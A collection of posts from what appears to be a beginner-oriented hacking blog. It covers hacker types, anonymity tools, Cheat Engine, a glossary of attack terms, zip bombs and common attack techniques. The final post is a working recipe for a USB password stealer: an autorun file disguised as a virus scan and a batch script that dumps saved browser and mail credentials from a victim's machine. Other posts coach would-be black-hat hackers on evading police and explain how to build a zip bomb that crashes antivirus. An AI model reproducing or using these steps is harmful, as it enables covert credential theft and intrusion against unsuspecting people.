Hacking Master Tips & Tricks

This blog is created to spread info about cyber security attacks and tips and tricks to avoid cyber attacks. This is for beginners. Every thing about cyber security. Become an cyber security guy by following our tips and tricks.

Showing posts with label Beginners. Show all posts
Showing posts with label Beginners. Show all posts

Types of hackers

April 16, 2017

Types of hackers

Now a days a lot of people want to be hackers. It is a good thing to have some extra stuffs in our knowledge bank. So lets start with the basics of hacking, by understanding the different types of hackers. There are mainly 3 types of hackers:

Black Hat Hackers
This category of hackers is also known as "crackers" . Hackers in this category are always tempted to gain privileges of someone(s) system without the authorization or permission. Usually these people works individually for their own gains/ fun. But as a team they can be deadly and their impact can cause trouble to a greater extent. Their activity mainly includes D-DOS attacks to websites, Site Defacing, Identity Theft, Vandalism etc. You will be lectured in detail about these terms in the following tutorials.

White Hat Hackers

In contradiction to Black hat hackers, White hat hackers are life-saving angels to many. They are also designated as "Ethical Hackers". In fact, Ethical Hacking is a career in today's word for many. To be an approved WHH, you need to be certified. But who cares about a certification, when we know what we are talking about and when we have a good and helping mind. To be more specific about their do's, they perform security tests on different systems with the authority's authorization which would be definitely illegal when the hands of a BHH gets involved. When compared to BHH, WHH are small in count, but they are still powerful.
Grey Hat Hackers 

As you can probably imagine, these are those categories of hackers who hacks for both good and bad. They usually do Black hatting for their malicious intentions and do White hatting with good intentions. In short, they help and harm. The majority of the people fall in this category. So they are typical hackers and still a potential threat!

Which One Should I Become?

If you are asking me, it will be a definite WHH. But you don't have to listen to me. What I want to tell you is, it will be always better to know what you are getting into. Hackers are sometimes getting caught, and when they are caught, they will be charges and sometimes may sent to jail for some short period of time if you are not a certified WHH. If you are asking me, I suggest you to keep learning until you gain some good knowledge in the matter and know how to remove all the traces of your hack. There can be different potential traces (like logs of the system you have hacked, your information's that got captured by the hacked system etc) that can lead an expert to pin point the hand cuffs to your hands. The different methods to remove the traces of the hacks will b lectured in the following tutorials.

Other types of Hackers

"Dude just wait a sec! I thought you were saying there are only 3 types of hackers in the world !"

Well and of-course, there are only 3 types of hackers. But there are some different subcategories for these types. Just like some Ranks by which we can categorize.

Elite Hacker - A grade rank meant to describe the most skilled/ reputed hackers. They knew/ discover the hacking methods that are still unknown and that are not been fixed.

Script Kiddie - A lower rank than the above one that designates someone that uses tools made by others to do some stuff and they don't even know a shit about the real hacking.

Neophyte - A much lower rank that describes a person that is a newbie to this matter and is having a little a knowledge about this matter.

Hacktivist - As the name rhymes to "Terrorist", they are the people who hacks to inject some religious, political anarchy.

Green Hat Hackers- As the name indicates, they love green. They hack only for money. They will not think about the cause. They just want the money from their slaves.

Congrats, you've are now one more step closer to your dream! Read at-least one article a day and we will reach there eventually.

Staying Anonymous

April 16, 2017

Staying Anonymous

If you are planning to be Black/ Grey/ Green Hat hacker, then you will be really worried about you anonymity. What concerns you most have to be "How to stay Anonymous?" . So here are some methods to stay anonymous. These are only some basic anonymity techniques and the more advanced techniques will be lectured in the following tutorials.
A. VPN
VPN is the acronym of Virtual Private Network. As from a hacker's point of view, here are the facts that justifies its need:
1) Counterfeit the ISP's packet detection measures.
    Maintain your anonymity and boost by keeping your ISP from throttling, inspecting and prioritizing the data sent to and from your system.
2) Keep your IP address anonymous.
    Prevent the places your packets are traversing from identifying your connection information and location.
3) Hide your online activities from third parties.
    As a VPN provides a secure tunnel to make a connection to the outside world, it will keep the third parties away from finding your online activities.
4) And of-course, prevent location identification and Geo targeting.
    Yeah! the title says it all.

To help you start, below are some of the FREE VPN's that are available.
Cyberghost http://cyberghostvpn.com/ --> Good for germany
USA IP http://www.usaip.eu/en/free_vpn.php
Free VPN http://thefreevpn.com/
VPN Tool http://www.vpntool.com/services.php --> good US
SecurityKIS http://www.securitykiss.com/sk/index.php
Hotspot Shield http://anchorfree.com/downloads/hotspot-shield/
ProXPN http://proxpn.com/
Open VPN http://openvpn.net/
Tor VPN https://torvpn.com/information.html
Its Hidden http://itshidden.com/
B. Proxies
Proxies are another less secure alternative for VPN's . Proxies does the same job as VPN's as it hides your IP when you are surfing through the internet. There are different types of proxies ranging from less anonymous to high anonymous proxies. One thing that you have to keep in mind is that the proxies will not last for ever. The available proxy address will change from time to time (which is a best thing for staying anonymous).
Below are some of the Proxy sites that you can use as a starting leveler. 
http://proxify.com/
http://www.hidemyass.com/
http://hidefromyou.com/
http://proxy6.org/
http://www.httpsurf.com/
http://www.safersurfing.net/
http://unblocked.in/
http://www.proxeasy.com/webclient.aspx
http://newipnow.com/

C. Virtual Machines
I suggest you to use a virtual machine while doing your stuffs. It is a best way to test your exploits without the pain of buying a new computer. For White hatters this is a heaven, because using a Virtual machine to test the servers(Remote Administration Tools) without the fear of a breach into your actual working environments. Now a days, the RATS and crypting techniques (will be discussed in RAT and Keyloggers section) became far more advanced in the favor of Black Hat hackers so that they can bye pass the Virtual machine environment and actually do their stuff in the host environments.
Below are some of the Popular VM's that you can use .
VMLite - http://www.vmlite.com/index.php?option=c...Itemid=153
VMWare - https://my.vmware.com/web/vmware/downloads
Virtual Box - https://www.virtualbox.org/wiki/Download

D. Be Easy With Your DOX Info
Another common mistake someone will do is that, he will put his details like nick name, email address, country etc on their slaves for the sake of name, You should do it only if you feel that much confident. As you are reading this now, I am pretty sure that, you take my word for this. Your confidence is what I say "Over Confidence". Don't put any kind of information after you are done. There is a site Fake Name Generator - http://www.fakenamegenerator.com/ which can help you generate some fake profiles. Believe me, you can get random profiles with a lots and lot of information from this site.

E. A Final Word
As I said in the starting of this tutorial, these are only some basic level Anonymity tools whose service you can make use of to stay anonymous. These cannot assure 100% anonymity and if you did something Black Hat stuffs and when you hear a door knock and see some cops outside your door, don't blame me :)

An Introduction to cheat Engines

April 16, 2017

Cheat Engine can help you save some time and cut corners on a few video games. It's a great option if you're into a game but don't want to invest more time in the game than you have to offer. Using the popular Plants vs. Zombies game as an example, you can get cheating and save time while having all the fun it offers. It's important to know all of your available cheats so you can get the most of your games.

Steps

Download Cheat Engine. You can find it athttp://cheatengine.org/downloads.php.

Download the game you want to use Cheat Engine on. This tutorial will use Plants vs. Zombies.

Open both the game and Cheat Engine.

Click on the "open processes" icon in upper left Cheat Engine window.

In the process list, click the "PlantsVsZombies.exe" option. Click on "open."

Select the value you want to change. For instance, when you open a new game of Plants vs. Zombies, you see you have only 25 suns.

Enter the new value in Cheat Engine. For example, enter 25 in the Hex field and click "First Scan." You'll get a lot of data in the table at left marked "Address" and "Value."

See the value change inside the game. For instance, when you pick up another sun in Plants vs. Zombies, your energy will be 100.

Top 10 Common Hacking Techniques You Should Know About

April 16, 2017

Unethical hacking can be called an illegal activity to get unauthorized information by modifying a system’s features and exploiting its loopholes. In this world where most of the things happen online, hacking provides wider opportunities for the hackers to gain unauthorized access to the unclassified information like credit card details, email account details, and other personal information. 

So, it is also important to know some of the hacking techniques that are commonly used to get your personal information in an unauthorized way.

10. Keylogger

Keylogger is a simple software that records the key sequence and strokes of your keyboard into a log file on your machine. These log files might even contain your personal email IDs and passwords.

Keylogger is one of the main reasons why online banking sites give you an option to use their virtual keyboards.

9. Denial of Service (DoS\DDoS)

A Denial of Service attack is a hacking technique to take down a site or server by flooding that site or server with a lot of traffic that the server is unable to process all the requests in the real time and finally crashes down.

For DDoS attacks, hackers often deploy botnets or zombie computers which have got the only work to flood your system with request packets.

8. Waterhole attacks

If you are a big fan of Discovery or National Geographic channels, you could relate easily with the waterhole attacks. To poison a place, in this case, the hacker hits the most accessible physical point of the victim.

For example, if the source of a river is poisoned, it will hit the entire stretch of animals during summer. In the same way, hackers target the most accessed physical location to attack the victim. That point could be a coffee shop, a cafeteria etc.

Once hackers are aware of your timings, they might create a fake Wi-Fi access point and modify your most visited website to redirect them to you to get your personal information.

7. Fake WAP

Even just for fun, a hacker can use software to fake a wireless access point. This WAP connects to the official public place WAP. Once you get connected the fake WAP, a hacker can access your data, just like in the above case.

6. Eavesdropping (Passive Attacks)

Unlike other attacks which are active in nature, using a passive attack, a hacker just monitors the computer systems and networks to gain some unwanted information.

The motive behind eavesdropping is not to harm the system but to get some information without being identified.

5. Phishing

Phishing is a hacking technique using which a hacker replicates the most-accessed sites and traps the victim by sending that spoofed link.

Once the victim tries to login or enter some data, the hacker gets that private information of the target victim using the trojan running on the fake site.

4. Virus, Trojan etc.

Virus or trojans are malicious software programs which get installed into the victim’s system and keeps sending the victims data to the hacker.

3. ClickJacking Attacks

ClickJacking is also known by a different name, UI Redress. In this attack, the hacker hides the actual UI where the victim is supposed to click.

In another word, the attacker hijacks the clicks of the victim that aren’t meant for the exact page, but for a page where the hacker wants you to be.

2. Cookie theft

The cookies of a browser keep our personal data such as browsing history, username, and passwords for different sites that we access. Once the hacker gets the access to your cookie, he can even authenticate himself as you on a browser.

1. Bait and switch

Using bait and switch hacking technique, the hacker runs a malicious program which the user believes to be authentic. This way, after installing the malicious program on your computer, the hacker gets unprivileged access to your computer.

Protecting Your Self

April 16, 2017

If you are working in a Linux system, donot work as a root user, especially when trying with new stuffs. Else you may have to compromise your entire system. You can switch to your root user when you know what you are doing. Beware of the fact that, even if you are running the application as a non-root user, the trojan can still works and get the user files/ keylogs etc. So as a general advice, I might say, never download untrusted contents especially from IRC, IM, small sites. torrents, warez etc.

Windows is an entirely different platform. If you are limiting yourself without the administrative privilages in windows, it will be pretty hard to keep on working, while in Linux, working as a non-root user and switching to a root user is pretty easy.

 

As I discussed in my previous tutorials, the Windows is the most targetted Operating System because of its popularity and lack of strong security measures. In windows, you have to install a Antivirus Software as the first step defense. Also, you have to update your antivirus as soon as a new update is availble. Without the proper updation of your antivirus softwares, they are nothing but a resource hungry daemon. So, to stay safe, never download any softwares from untrusted sources.

Basic Config &Tools

April 15, 2017

Ok. Now we're going to have some discussions about the basic configs and security checks you should take so that you can be safe in your hacking deeds. Well, the cyber-world is no way dissimilar to the actual world, where lots of crimes are committed everyday, and ofcourse you don't want to be targetted by some dull skids, and also, you may never need cops outside your door if ever you did something dull, out of curiosity. 

What is the "Limit" of your Machine?

First of all, as everything we start, here also we must know what is the "limit" or capacity of your computer. You need to know the basic specifications of your computer like:

The memory size of the RAM and the HDDThe speed of your processorHow extreme your graphics card can go, etc

Now you will be more aware of the limitations of your system as you have completed a background check of your machine. So you know what you CAN do and what you CAN'T do with your box.

 

Essential Softwares you need to Install in your Machine?

 

Guess what? This tutorial is mostly biased to support Windows Operating system because of one and only one reason, its reach to the public and the easness in its usage. Frankly, Windows is the most commonly used Operating System in the word as you all may know. And it is only because of its popularity these hackers/ breachers are attacking mostly windows systems. The velow programs that are discussed will work mainly on windows but some of it will work in Linux/ Mac too.

 

1. Anti-Virus Program

Yes, every one will know about it. No need of an explanation here. This is the first line of defense that every one will take. It is adviable to be used in every system, so as to ensure the security at the cost of performance and resources.

 

2. Virtual Machine

At the word that we are currenlty living in, The Virtual Machines are the inevitable part of the System of a Hacker. Every latest viruses that is being released everyday can easily byepass the antivirus securities. Though the antivirus softwares constantly updates their defintions to include more virus signatures, by that time the viruses would have done their tasks.

 

Here, we are the one who will be making RATS/ Keyloggers and exploits. So the risk of testing these kinds of stuffs will be high as, many times, we may have to compromise the stability of our Operating Systsm and may have to re install them.

 

So basically, what is a virtual machine? Well, it is a virtual computer inside you OS which is being simulated to perform the real computer tasks in reality. As I said, when you are creating exploits and all, sometimes things can go fataly wrong and you may lose all of your valuable data. So as a remedy, we can use a virtual machine to develop and test our stuffs. The virtual machine will create a virtual hard disk and executes all the programs withi it. So the scope of your program's execution environment will be contained within the virtual hard disk inside you virtual machine and you can keep your hot operating system safe and sound.  

 

The main disadvantages of the vitual machines are , they will take a lot of resources to sinulate a virtual computer inside your real one. It can be ignored when we can foresee the benefits that we will be getting.

 

3. Sandboxie

So, now you will be thinking about developing some exploits/ RATS. In that case, your system will be your laboratory. So we must give our lab, its own defences.

Sandboxie is a program that will let you run your suspicious programs inside it. Usually, the execution will be done in some remote memory locations that are isolated from the main execution environment. So when you run the application within it, we can easily terminate it at our need without causing a damage to our  "Lab'.

 

4. COMODO Firewall

As an additional security, you can install a firewall in additional to the host operating systems default firewall. Comodo firewall holds some flexible UI so as to monitor every actions that are being performed through our open ports. So using this, we can monitor our inbound and outboud connections and check if anything suspicious is being happening, when you are idle. 

5. VPN (Virtual Private Network)

This one is almost discussed twice in the beginners tutorials. So you are now having knowledge about what I had to tell here, so I am not repeating it here. :)

Hackers Dictionary

April 15, 2017

Let us start our journey from the basics ! Below are some frequently used words, their brief meaning and acronyms that are commonly used in this world !

ACRONYMS

R.A.T :-> Remote Administration Tool

DrDoS :-> Distributed Reflected Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look like it's coming from multiple ips. Amplification of power in the attack COULD occur.

VPS :-> Virtual Private Server

SE :-> Social Engineering

HTTP :-> Hyper Text Transfer Protocol. The foundation of data communication for the World Wide Web.

SSH :-> Secure Shell, used to connect to Virtual Private Servers.

FTP :-> File Transfer Protocol. Used for transferring files over an FTP server.

XSS (CSS) :-> Cross Site Scripting

Malware :-> Malicious Software

Skid :-> Script Kid/Script Kiddie

DDoS :-> Distributed Denial of Service

VPN :-> Virtual Private Network

Nix :-> Unix based operating system, usually refered to here when refering to DoS'ing.

SQL :-> Structured Query Language. It usually goes along with a word after it, such as "SQL Injection."

FUD :-> Fully Undetectable

WORDS

FUD :-> Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone.

LOIC/HOIC :-> Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances.

Trojan :-> A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer.

Botnet :-> Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.

SQL Injection :-> An SQL injection is a method often used to hack SQL databases via a website, and gain admin control of the site.

Root :-> Highest permission level on a computer, able to modify anything on the system without restriction.

Warez :-> Software piracy

White Hat :-> A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se)

Rootkit (ring3 ring0) :-> A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting in safemode. Ring0 - Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode.

Script Kiddie :-> A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.

IP Grabber :-> A link that grabs someone's IP when they visit it.

DDoS :-> Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can send packets to a connection on a website usually from a booter.

VPS :-> The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers' virtual machines, is in many respects functionally equivalent to a separate physical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software.

Malware :-> Software designed to do all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave.

Phreak :-> Phone Freaks. Hackers who hack cell phones for free calling. Free Long distance calling. Etc.

Bot :-> A piece of malware that connects computer to an attacker commonly using the HTTP or IRC protocal to await malicous instructions.

Shell :-> The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter.

ANSI Bomb :-> ANSI.SYS key-remapping commands consist of cryptic-looking text that specifies, using ansi numeric codes to redefine keys.

DOX :-> Personal information about someone on the Internet usualy contains real name, address, phone number, SSN, credit card number, etc.

Worm :-> Software designed to spread malware with little to no human interaction.

Deface :-> A website deface is an attack on a site that changes the appearance of the site or a certain webpage on the site.

Keylogger :-> A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.

Remote Administration Tool :-> It's a general term for a hack that can let someone remotely control your computer with admin access.

Black Hat :-> A hacker who performs illegal actions to do with hacking online. (Bad guy, per se)

 

Introduced to zip Bomb

April 10, 2017
This post is about zip bomb and it's working. You will also get a gist of how petabytes of files are converted into smaller files of kilo or mega bytes. Now I will take you through some things that will really intrigue you. Let's get started straight away.
What's zip bomb?
A zip bomb also known as zip of death or decompression bomb, is a malicious archive file designed to crash or render useless the program or system reading it. It is open employed to disable antivirus software in order to crate opening for traditional types of viruses.
Rather than highjacking the normal operation of a program, the zip bomb allows a program to work as intended, the archive is carefully crafted so that unpacking it i.e if an antivirus scans the zip file for viruses, will require inordinate amount of time, disk space or memory.
But as everything it has certain limitations ofcourse. This zip file is a very tiny zip file most of them are measured in Kilobytes.
Now, you may have lots of questions like
1) Why is it so tiny?
2) Why call it a zip BOMB when it's so tiny?
3) How is it so small?
4) How does it work?

So here are your answers:
1) Why is it so tiny?
Zip bomb is a tiny zip file. Now it is made so tiny to avoid suspicion. It's obvious aint it? You dont want tell the police you are a thief, you make it look different. It is made tiny because of compression of huge amount of data and the reason it being tiny makes using it a "pure hacker like mentality"
2) Why call it a zip BOMB when it's so tiny?
Never judge a book by it's cover. Never underestimate smaller one's. It is called zip bomb or zip of death becasue it contains upto terabytes, petabytes or even exabytes of data.That's the key to clear out malware and hence blocking every obstacle in it's path leaving a straight Asphalt. Now you will certainly want to know, how is it possible to complete such large a files into a zip file of such small size. Don't worry you will get your answers further. A simple example of a zip bomb is the file 42.zip, which is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3-gigabyte (4 294 967 295 bytes; ~ 3.99 GiB) file for a total of 4.5 petabytes (4 503 599 626 321 920 bytes; ~ 3.99 PiB) of uncompressed data. This file is still available for download on various websites across the Internet. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out-of-memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level, effectively converting their exponential growth to linear. There are also zip files that, when uncompressed, yield identical copies of themselves.
3) How is it so small?
Nowadays various compression tools make us of term called "looseless compression algorithm". As the name suggests this algorithm strives to compress files without any loss of information, which is very important of course. We dont want to lose any information while we compress files. To show how this zip file works, let me tal about it's simple principle. Computer only understands binary language i.e 0's and 1's. So every file in order to be understood by a computer must in binary i.e 0,1 format. If we take a binary number "0 1 0 0 0 1 1 1" and let's say we have a tool to compress it to a number like "0 1 3 0 3 1"? The same logic apllies here. In the initail binary number there were 3 o's and 3 1's starting from 3rd digit. we just replaced it with 30 and 31. Now this might not be the exact logic that governs the compression but correct upto a certain extent. Thus the zip bomb which will contain only 0's and 1's will work in this way making copies of some files again and again and compressing them into a single zip file resulting it to throw up data of about terabytes, petabyte or exabytes.
Make a text file with only o's and 1's. Make a copy of it.
Type upto 1000 zeros and just do "Ctrl+a", "Ctrl+c","Ctrl+v".
Do it until the text file begins to lag.
The size should be more than 1 Gigabyte.
Then compress it and see the magic. The compressed file will be arond 1 Megabyte.
4) How does it work?
Zip bomb contains about petabytes of data, this if an antivirus tries to scan it, it will start to decompress it first. But just imagine what will happen if a file of about a kilobyte is decompressed and we get a file of about a few or more petabytes. The answers simple, before the zip file is completely scanned the antivirus will crash, creating a loophole for attackers.

USB Stealer

April 10, 2017
Windows allows the storage of the passwords, as do modern browsers. While this feature is convenient for users, it has imposed itself as a big security risk among organizations. We know that browsers store most passwords on daily basis, like MSN messenger, Yahoo, Facebook passwords, etc. Most people lack time and ask their browsers to save their passwords. As we know, there are many tools available to recover saved passwords, so in this article I will explain to you how to make aUSB passwordstealer and steal saved passwords.
Just to explain the concept, we are going to collect some password stealing tools, tools that are freely available on the internet and capable of stealing the passwords stored in the browsers or other windows files.
Then, we create a batch program that will execute these combined programs and store the stolen usernames and passwords in a text file.
To further spice up the penetration testing demonstration, we will also make this batch file execute as an auto-run for the USB stick, effectively stealing the passwords as we plug it in.
THINGS YOU WILL NEED
MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications.
Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express, windows mail, POP3, etc.
IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.
Protected storage pass viewer(PSPV) - Protected Storage Passview is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express, and MSN Explorer.
Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
ChromePass - ChromePass is a small password recovery tool that allows you to view the usernames and passwords stored by Google Chrome Web browser.
STEPS :
1. First of all download all 5 tools and copy the executables (.exe files) i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into yourUSB Drive.
2. Create a new Notepad and input the following text:
[autorun] open=launch.bat ACTION= Perform a Virus Scan
Save the Notepad and rename it from "New Text Document.txt" to "autorun.inf"
Now copy the "autorun.inf" file onto yourUSB Stick.
3. Create another Notepad and write the following text onto
it:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
4. Save the Notepad and rename it from "New Text Document.txt" to "launch.bat"
5. Copy the "launch.bat" file onto your USBdrive. Now your USB Password stealer is ready, all you have to do is insert it in your victim's computer and a popup will appear. In the popup window, select the option "launch virus scan."
After this you can see saved password in .TXT files
Purely for educational purposes. Use these tools at your own risk!